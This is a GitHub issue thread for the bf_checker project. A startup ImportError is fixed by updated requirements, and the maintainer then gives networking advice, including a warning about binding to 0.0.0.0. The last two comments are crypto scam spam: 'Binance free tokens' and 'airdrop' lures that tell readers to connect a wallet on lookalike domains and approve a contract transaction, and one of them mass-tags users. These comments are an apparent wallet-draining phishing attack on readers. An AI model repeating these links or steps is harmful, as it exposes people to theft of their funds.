### ISSUE TITLE
no start

### ISSUE THREAD

**Issue by ka1myk** [H256/bf_checker#3]
(.venv) C:\Users\KLKALMYK\Downloads\bf_checker-main>python app.py
Traceback (most recent call last):
  File "app.py", line 5, in <module>
    import dash
  File "C:\Users\KLKALMYK\Downloads\bf_checker-main\.venv\lib\site-packages\dash\__init__.py", line 1, in <module>
    from .dash import Dash, no_update  # noqa: F401
  File "C:\Users\KLKALMYK\Downloads\bf_checker-main\.venv\lib\site-packages\dash\dash.py", line 19, in <module>
    from werkzeug.debug.tbtools import get_current_traceback
ImportError: cannot import name 'get_current_traceback' from 'werkzeug.debug.tbtools' (C:\Users\KLKALMYK\Downloads\bf_checker-main\.venv\lib\site-packages\werkzeug\debug\tbtools.py)

**Comment by H256** [comment]
Hi @ka1myk I've updated the requirements.txt and app.py to get rid of this problem. Could you try again?

**Comment by ka1myk** [comment]
Hello! Start successfully

![изображение](https://user-images.githubusercontent.com/22070331/160950869-cd2ed5e8-9b54-4b79-9278-7a4c70b44490.png)


but 

![изображение](https://user-images.githubusercontent.com/22070331/160950942-99b52173-fc54-4cbd-9517-8a610c05fa70.png)

error, nothing

**Comment by H256** [comment]
Hi, looks like a configuration issue to me. 
Could you try to open the page directly from the machine where it's started via 127.0.0.1 - my guess is that it's not allowing CORS from the 62.... IP. 

Also you could try to set the IP in .env to 0.0.0.0, **BUT be careful** because the IP might then also be visible from the outside - so ensure that somehow only you have access to the machine.

**Comment by shokry055** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by fahirazm** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @cccedric, @usstdqq, @hypereg, @pakinmaksim, @viktorbezdek, @vastava, @AlejandroPOcz
